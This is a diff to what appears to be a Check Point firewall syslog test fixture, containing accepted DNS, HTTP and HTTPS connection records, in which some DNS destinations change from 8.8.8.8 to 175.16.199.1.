-<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37701"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a7,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53632"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37701"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58862"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ae,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33463"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ae,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60298"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43492"; xlatesrc:"0.0.0.0"]
@@ -1795,21 +1795,21 @@
 <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58864"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58866"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58868"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45745"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45745"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ae,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41823"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ae,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33585"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26810"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x5,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59124"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x6,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59126"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x7,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59128"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x8,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59130"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55776"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55776"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.20.72"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41686"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x9,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37337"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x9,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37337"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45524"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45526"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45528"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; log_delay:"1585501103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45530"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47325"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47325"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"108.177.119.154"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60980"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ba,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34118"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
